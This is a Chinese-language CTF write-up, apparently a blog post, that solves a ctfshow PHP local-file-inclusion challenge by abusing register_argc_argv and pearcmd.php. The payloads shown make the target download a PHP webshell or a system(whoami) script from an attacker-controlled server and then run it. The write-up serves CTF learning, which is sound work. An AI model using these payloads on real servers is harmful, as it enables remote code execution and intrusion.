在之前ctfshow平台的萌新22,大家都认为是无解的,题目也介绍了"还能搞,阿呆表示将直播倒立放水"。但是在级客巅峰结束的那天晚上,群里的师傅介绍说,如果修改了php.ini里面的配置(register_argc_argv)可以做出来。最后是真的做出来了。
使用阿呆~~~?
下面是自己的思考,感谢Guoke师傅和ha1c9on师傅的帮助
一. 源代码
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\:|\/|\\\/i",$c)){
include($c.".php");
}
}else{
highlight_file(__FILE__);
}
?>
二. register_argc_argv的介绍
通过可变信息通过GET方法是类似于参数传递给可执行文件。许多语言处理等方面argc和argv参数。 argc是参数计数,并,argv是索引数组,包含的参数。如果您想声明变量$argc和$argv和模仿这种功能,使register_argc_argv。
$argc变量是⽤于记录数组的⼤⼩
$argv变量是⽤于记录输⼊的参数。
这里借p神的介绍
经过简单测试,发现⽼版本(测试版本为5.2.17)默认为 On,新版本(测试版本为 5.4.45、5.5.9、
7.3.4)默认为 Off
奇淫技巧
这个是自己看p神的知识星球知道的。
我们是可以通过$_GET或者$_POST的⽅式来操控
$_SERVER['argv']的值的,但是如果测试可以发现,如果直接传⼊值,⽆论多少个参数,$argc的
个数始终是 1
#测试代码
<?php
error_reporting(0);
$a=$_SERVER['argv'];
var_dump($a);
?>
而我们可以通过+来进行分隔符。
(这里不解释,需要知道的可以去p神的知识星球了解)
拓展:这个小trick,自己前几天出个一个题,如果有兴趣的可以去ctfshow平台的web入门126去试一试。
三. PEAR的介绍
如何熟悉PEAR的使用?
在linux下面安装直接输入命令apt install php-pear
四. 解题
参考链接
这个题只需要利用文章里面的第一个方法:
下载一个档案文件(php文件)并使用lfi
而这个下载的命令是pearcmd.php里面有的
在pearcmd.php目录下面输入php pearcmd.php -help
而正好,这个题开启了register_argc_argv可以通过+来分隔命令,先进行包含pearcmd.php然后在通过+分隔符来执行download命令
方法一
这个方法是Guoke师傅告诉我的,可以在我们的vps上面创建一个eval.php里面内容是
<?php
echo "<?php system(whoami);?>";
?>
然后在题目上传值
?c=pearcmd&+download+http:/xx.xx.xx.xx/eval.php
最后访问eval.php就执行成功
方法二
是ha1c9on师傅告诉我的,可以在~目录下创建一个shell.php 内容就是一句话木马.
然后通过python3开一个http服务 python3 -m http.server 81
访问的时候就是~目录下面的文件
当我们控制目标服务器去访问eval.php的时候会自动下载到目标的服务器上面
payload:?c=pearcmd&+download+http://xx.xx.xx.xx:81/shell.php
然后访问并执行命令
获得flag
总结:
方法一:
实现的原因是下载的过程会执行php代码。这里自己测试了一下如果,利用方法一,文件内容是
<?php system(whoami)?>,然后访问这个文件会输出www-data。但是文件内容也是www-data。所以就验证了我的解释。
方法二:
实现的原因是我们通过python3开一个服务,而php文件的路径不在网站根目录下面就不会当php解析就会自动下载。
如果,文章也不足的地方希望师傅们指出。共同进步。
367
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
